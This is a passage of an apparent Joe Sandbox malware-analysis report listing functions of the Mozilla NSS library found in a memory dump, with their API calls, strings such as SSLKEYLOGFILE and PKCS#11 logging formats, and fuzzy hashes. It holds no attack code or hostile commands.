Opcode ID: a2566de81c25b9e92c0b3ff8bee21e4f1aa64ab71e92d1909347ff7f097453a9
Instruction ID: 433b68247e0e0f04ae59d30d5ef75069b3e07f58368efe706919043a9bf4fa1f
Opcode Fuzzy Hash: a2566de81c25b9e92c0b3ff8bee21e4f1aa64ab71e92d1909347ff7f097453a9
Instruction Fuzzy Hash: 97B150B4F012199FDF01DFA9D844BAEBBB4AF09348F180025E815E7741E735E994CBA2

Function 6CAC4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAC4C4C
EnterCriticalSection.KERNEL32(?), ref: 6CAC4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAC4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4DB7

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

TlsGetValue.KERNEL32 ref: 6CAC4DD7
EnterCriticalSection.KERNEL32(?), ref: 6CAC4DEC
PR_Unlock.NSS3(?), ref: 6CAC4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CAC4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CAC4E71
free.MOZGLUE(00000000), ref: 6CAC4E7A
PR_Unlock.NSS3(?), ref: 6CAC4EA2
TlsGetValue.KERNEL32 ref: 6CAC4EC1
EnterCriticalSection.KERNEL32(?), ref: 6CAC4ED6
PR_Unlock.NSS3(?), ref: 6CAC4F01
free.MOZGLUE(00000000), ref: 6CAC4F2A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 6babeae89e5a84121232e307b9de9a923b9049cb7e9cf4868a9b91022ed727ff
Instruction ID: d6faba8435f4f3d7ebfa2e4da67df1729e32a0a85d24111fd0fcca05cadfbbc0
Opcode Fuzzy Hash: 6babeae89e5a84121232e307b9de9a923b9049cb7e9cf4868a9b91022ed727ff
Instruction Fuzzy Hash: 75B1F275B006059FEF01EF68D884BAA77B4BF09318F194124ED1597B11EB34E9A4CBD2

Function 6CB16E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB16BF7), ref: 6CB16EB6

Part of subcall function 6CA71240: TlsGetValue.KERNEL32(00000040,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA71267
Part of subcall function 6CA71240: EnterCriticalSection.KERNEL32(?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA7127C
Part of subcall function 6CA71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA71291
Part of subcall function 6CA71240: PR_Unlock.NSS3(?,?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA712A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBBFC0A,6CB16BF7), ref: 6CB16ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB16EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB16EFC
PR_NewLock.NSS3 ref: 6CB16F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB16F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB16BF7), ref: 6CB16F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB16BF7), ref: 6CB16F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB16BF7), ref: 6CB16FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB16BF7), ref: 6CB16FFD

Strings

NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CB16F4F
SSLKEYLOGFILE, xrefs: 6CB16EB1
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB16FF8
SSLFORCELOCKS, xrefs: 6CB16F2B
# SSL/TLS secrets log file, generated by NSS, xrefs: 6CB16EF7
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB16FDB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 05f5ef50cc926fc16b4de650225e35f1586b6062a208827d48f150394e8edbbd
Instruction ID: 0ebaf2ecd38c4fc93561d69e3731cf8b6af0606c4faee00211d1b2dc0aba06c7
Opcode Fuzzy Hash: 05f5ef50cc926fc16b4de650225e35f1586b6062a208827d48f150394e8edbbd
Instruction Fuzzy Hash: 23A129B2B6D9D0C7EB50463CEC0039533A2EB8B369F588365E831D7ED5DBB594418392

Function 6CA8C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA8C4D5

Part of subcall function 6CADBE30: SECOID_FindOID_Util.NSS3(6CA9311B,00000000,?,6CA9311B,?), ref: 6CADBE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CA8C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CA8C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA8C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6CA8C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6CA8C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CA8C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CA8C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA8C751
PL_FinishArenaPool.NSS3(?), ref: 6CA8C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CA8C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CA8C7A9

Strings

security, xrefs: 6CA8C63F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: ed34f58fe2848894efa523fce7991e17cda6243565c9559c0034946c5768c1e8
Instruction ID: 9ca69dfd3382fddd4174db591420c06fce2d486e55b3bef213c062d93b1d6e8d
Opcode Fuzzy Hash: ed34f58fe2848894efa523fce7991e17cda6243565c9559c0034946c5768c1e8
Instruction Fuzzy Hash: 82810A71C02108ABEF00EA95DD85BEE7774EF0531CF284335E915A6A91E721D9C9CFA2

Function 6CAB6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CAB6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB6DC3

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CAB6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CAB6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CAB6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CAB6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CAB6EB9

Strings

pDigest = 0x%p, xrefs: 6CAB6E27
pulDigestLen = 0x%p, xrefs: 6CAB6E42
*pulDigestLen = 0x%x, xrefs: 6CAB6EB4
ulDataLen = %d, xrefs: 6CAB6E0E
pData = 0x%p, xrefs: 6CAB6DF5
C_Digest, xrefs: 6CAB6D81
(CK_INVALID_HANDLE), xrefs: 6CAB6DBC
hSession = 0x%x, xrefs: 6CAB6D9E, 6CAB6DAE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 49ed7c55f5359188e771ea04ecf061d3af6c748c79a2ea0516e1ee31ba06a213
Instruction ID: 7f3d606d9b214d36ad8063a1cb4a41f6e51ab1ec82132c4b2419d0a919d4bf95
Opcode Fuzzy Hash: 49ed7c55f5359188e771ea04ecf061d3af6c748c79a2ea0516e1ee31ba06a213
Instruction Fuzzy Hash: 3341D735601085AFDB04DF54ED48F8E7BB9EB4AB59F084024F908A7711DF319998CBA3

Function 6CAB8820 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6CAB8846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB8874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8883

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB8899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6CAB88BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6CAB88D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAB88EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6CAB8907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6CAB8979

Strings

ulEncryptedPartLen = %d, xrefs: 6CAB88CE
*pulPartLen = 0x%x, xrefs: 6CAB8974
pulPartLen = 0x%p, xrefs: 6CAB8902
pPart = 0x%p, xrefs: 6CAB88E7
C_DecryptVerifyUpdate, xrefs: 6CAB8841
pEncryptedPart = 0x%p, xrefs: 6CAB88B5
(CK_INVALID_HANDLE), xrefs: 6CAB887C
hSession = 0x%x, xrefs: 6CAB885E, 6CAB886E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate
API String ID: 1003633598-2764998763
Opcode ID: 8d25aa00ea05ba4c5859aed2529543c65c5b7c8c2363d03294051031ebdc832e
Instruction ID: 37307bacdf92646e47a24a31a1ec1be5de7ef1294658bc72cd7be21e26d6afbf
Opcode Fuzzy Hash: 8d25aa00ea05ba4c5859aed2529543c65c5b7c8c2363d03294051031ebdc832e
Instruction Fuzzy Hash: AE41C835601186AFDB40CF98ED48E4E7B75EB4A75DF084025F50867611DB319998CBA3

Function 6CAB6960 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6CAB6986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB69B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB69C3

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB69D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6CAB69FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6CAB6A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAB6A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6CAB6A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6CAB6AB9

Strings

C_DecryptUpdate, xrefs: 6CAB6981
ulEncryptedPartLen = %d, xrefs: 6CAB6A0E
*pulPartLen = 0x%x, xrefs: 6CAB6AB4
pulPartLen = 0x%p, xrefs: 6CAB6A42
pPart = 0x%p, xrefs: 6CAB6A27
pEncryptedPart = 0x%p, xrefs: 6CAB69F5
(CK_INVALID_HANDLE), xrefs: 6CAB69BC
hSession = 0x%x, xrefs: 6CAB699E, 6CAB69AE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate
API String ID: 1003633598-2105479268
Opcode ID: a57b4c479551dbc08172febd372b5cbee784d3c46724a9f54aa1fc42cd5c87ee
Instruction ID: b8c4600ee0c00c4868fd247af28a64822d5a2e7f69047ea2f0c20492489da31c
Opcode Fuzzy Hash: a57b4c479551dbc08172febd372b5cbee784d3c46724a9f54aa1fc42cd5c87ee
Instruction Fuzzy Hash: 2441D735641089AFDB04CF54ED48A4E7BB9EB4A759F088024F908A7711DF309D98CBA3

Function 6CA84AF0 Relevance: 27.4, APIs: 18, Instructions: 355memorystringthreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,?,6CAC1444,?,?,00000000,?,?), ref: 6CA84BD4

Part of subcall function 6CAC0C90: PR_SetError.NSS3(00000000,00000000,6CAC1444,?,00000001,?,00000000,00000000,?,?,6CAC1444,?,?,00000000,?,?), ref: 6CAC0CB3

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CAC1444), ref: 6CA84B87
memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA84BA5

Part of subcall function 6CAD88E0: TlsGetValue.KERNEL32(00000000,?,?,6CAE08AA,?), ref: 6CAD88F6
Part of subcall function 6CAD88E0: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE08AA,?), ref: 6CAD890B
Part of subcall function 6CAD88E0: PR_NotifyCondVar.NSS3(?,?,?,?,?,6CAE08AA,?), ref: 6CAD8936
Part of subcall function 6CAD88E0: PR_Unlock.NSS3(?,?,?,?,?,6CAE08AA,?), ref: 6CAD8940

PR_SetError.NSS3(FFFFE02A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA84DF5
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6CA84B94

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CAC1444,?), ref: 6CA84BC2
PR_GetCurrentThread.NSS3(?,?,?,?,?,00000000,00000000), ref: 6CA84BEF
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CAC1444), ref: 6CA84C27
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CAC1444), ref: 6CA84C42
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA84D5A
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CA84D67
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA84D78
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA84DE4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA84E4C
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA84E5B
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA84E6C

Part of subcall function 6CA84880: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA848A2

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA84EF1
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA84F02

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Error$Arena$Alloc_Item_Valuememcpystrlen$CriticalEnterSectionUnlockZfree$AllocateArena_CompareCondCurrentFreeNotifyThreadfree
String ID:
API String ID: 24311736-0
Opcode ID: bbcd0953f7e92bb63a650b6cbf8cb57618f596d103316e9d904113135811fc25
Instruction ID: 5092b6c89d4415bbdc7e0035dd905d10bc52fd3a5c6c2be621757c0b9ca0fa46
Opcode Fuzzy Hash: bbcd0953f7e92bb63a650b6cbf8cb57618f596d103316e9d904113135811fc25
Instruction Fuzzy Hash: CEC15CB5E013559BEB00CF68DD91BDF77F8AF09308F154029E819A7701E731E9988BA2

Function 6CB128C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6CB15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB15B56

TlsGetValue.KERNEL32 ref: 6CB1290A
EnterCriticalSection.KERNEL32(00000001), ref: 6CB1291E
TlsGetValue.KERNEL32 ref: 6CB12937
EnterCriticalSection.KERNEL32(00000001), ref: 6CB1294B
PR_EnterMonitor.NSS3(?), ref: 6CB12966
PR_EnterMonitor.NSS3(?), ref: 6CB129AC
PR_ExitMonitor.NSS3(?), ref: 6CB129D1
PR_EnterMonitor.NSS3(?), ref: 6CB129F0
PR_EnterMonitor.NSS3(?), ref: 6CB12A15
PR_EnterMonitor.NSS3(?), ref: 6CB12A37
PR_ExitMonitor.NSS3(?), ref: 6CB12A61
PR_ExitMonitor.NSS3(?), ref: 6CB12A78
PR_ExitMonitor.NSS3(?), ref: 6CB12A8F
PR_ExitMonitor.NSS3(?), ref: 6CB12AA6

Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB4945B
Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB49479
Part of subcall function 6CB49440: EnterCriticalSection.KERNEL32 ref: 6CB49495
Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB494E4
Part of subcall function 6CB49440: TlsGetValue.KERNEL32 ref: 6CB49532
Part of subcall function 6CB49440: LeaveCriticalSection.KERNEL32 ref: 6CB4955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6CB12AF9
free.MOZGLUE(?), ref: 6CB12B16
PR_Unlock.NSS3(?), ref: 6CB12B6D
PR_Unlock.NSS3(?), ref: 6CB12B80

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: ef1ccd5c6f21f25c479f8026e6d1197a65f87f2f4e4f864bfd0365d8d54e64ad
Instruction ID: 39056468378c3a657a712be24c97d49c73778a949a9f0b945ceb4f98f2b0b580
Opcode Fuzzy Hash: ef1ccd5c6f21f25c479f8026e6d1197a65f87f2f4e4f864bfd0365d8d54e64ad
Instruction Fuzzy Hash: D081B5B5A047805BEB209F78EC4579B77F9AF15308F044928E85AC7B11EB35E518CB93

Function 6CAD8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CAD8E01,00000000,6CAD9060,6CBE0B64), ref: 6CAD8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CAD8E01,00000000,6CAD9060,6CBE0B64), ref: 6CAD8E9E
PORT_ArenaAlloc_Util.NSS3(6CBE0B64,00000001,?,?,?,?,6CAD8E01,00000000,6CAD9060,6CBE0B64), ref: 6CAD8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CAD8E01,00000000,6CAD9060,6CBE0B64), ref: 6CAD8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CAD8E01,00000000,6CAD9060,6CBE0B64), ref: 6CAD8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CAD8E01,00000000,6CAD9060,6CBE0B64), ref: 6CAD8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CAD8E01), ref: 6CAD8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBE0B64,6CBE0B64), ref: 6CAD8F11
